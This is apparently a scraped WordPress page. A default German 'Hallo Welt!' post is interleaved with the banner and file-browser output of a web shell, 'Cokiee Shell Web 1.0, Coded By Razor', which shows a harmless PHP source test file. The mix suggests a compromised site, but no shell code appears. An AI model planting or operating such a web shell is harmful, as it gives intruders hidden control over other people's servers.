Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/standard/tests/file/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/standard/tests/file/bug49047.phpt |
--TEST-- Test fopen() function : variation: interesting paths, no use include path --FILE-- <?php // fopen with interesting windows paths. $testdir = __DIR__ . '/bug47177.tmpdir'; mkdir($testdir); $t = time() - 3600; touch($testdir, $t); clearstatcache(); $t2 = filemtime($testdir); if ($t2 != $t) echo "failed (got $t2, expecting $t)\n"; rmdir($testdir); echo "Ok."; ?> --EXPECTF-- Ok.
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare